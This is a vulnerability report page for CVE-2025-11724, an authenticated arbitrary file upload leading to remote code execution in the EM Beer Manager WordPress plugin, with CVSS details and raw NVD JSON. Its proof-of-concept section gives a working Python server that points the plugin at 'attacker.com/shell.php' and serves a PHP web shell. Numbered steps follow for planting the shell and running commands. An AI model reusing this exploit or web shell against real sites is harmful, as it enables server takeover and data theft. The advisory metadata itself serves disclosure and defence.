Security Vulnerability Report
CVE-2025-11724 CVSS 8.8 HIGH

CVE-2025-11724

Published: 2025-11-04 05:15:57
Last Modified: 2026-04-15 00:35:42

Description

The EM Beer Manager plugin for WordPress is vulnerable to arbitrary file upload leading to remote code execution in all versions up to, and including, 3.2.3. This is due to missing file type validation in the EMBM_Admin_Untappd_Import_image() function and missing authorization checks on the wp_ajax_embm-untappd-import action. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files including PHP files and execute code on the server granted they can provide a mock HTTP server that responds with specific JSON data.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EM Beer Manager plugin for WordPress <= 3.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json
import http.server
import socketserver

# PoC for CVE-2025-11724 - EM Beer Manager Arbitrary File Upload
# This is a mock HTTP server that serves malicious JSON data


class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if '/untappd-feed' in self.path:
            # Return malicious JSON with PHP shell URL
            response = {
                'response': {
                    'checkins': {
                        'items': [{
                            'media': {
                                'photo': {
                                    'img_id': 12345,
                                    'photo_img_md': 'http://attacker.com/shell.php',  # Malicious PHP file URL
                                    'caption': 'test'
                                }
                            }
                        }]
                    }
                }
            }
            body = json.dumps(response).encode()
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.send_header('Content-Length', str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        elif '/shell.php' in self.path:
            # Serve malicious PHP shell
            php_shell = b'<?php system($_GET["cmd"]); ?>'
            self.send_response(200)
            self.send_header('Content-Type', 'text/plain')
            self.send_header('Content-Length', str(len(php_shell)))
            self.end_headers()
            self.wfile.write(php_shell)
        else:
            self.send_response(404)
            self.end_headers()


PORT = 8080

with socketserver.TCPServer(('', PORT), MaliciousHandler) as httpd:
    print(f'Malicious server running on port {PORT}')
    httpd.serve_forever()

# WordPress Exploitation:
# 1. Attacker needs subscriber-level account
# 2. Setup malicious HTTP server above
# 3. Send AJAX request to wp-admin/admin-ajax.php with action=embm-untappd-import
# 4. The plugin will download and save shell.php to uploads directory
# 5. Access shell.php via web to execute commands

References

https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/embm-admin-actions.php#L393
https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L867
https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L899
https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L912
https://www.wordfence.com/threat-intel/vulnerabilities/id/76b7a946-71ad-46da-95f6-a02703812938?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11724",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-04T05:15:56.887",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The EM Beer Manager plugin for WordPress is vulnerable to arbitrary file upload leading to remote code execution in all versions up to, and including, 3.2.3. This is due to missing file type validation in the EMBM_Admin_Untappd_Import_image() function and missing authorization checks on the wp_ajax_embm-untappd-import action. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files including PHP files and execute code on the server granted they can provide a mock HTTP server that responds with specific JSON data."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-434"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/embm-admin-actions.php#L393", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L867", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L899", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L912", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/76b7a946-71ad-46da-95f6-a02703812938?source=cve", "source": "[email protected]"}
    ]
  }
}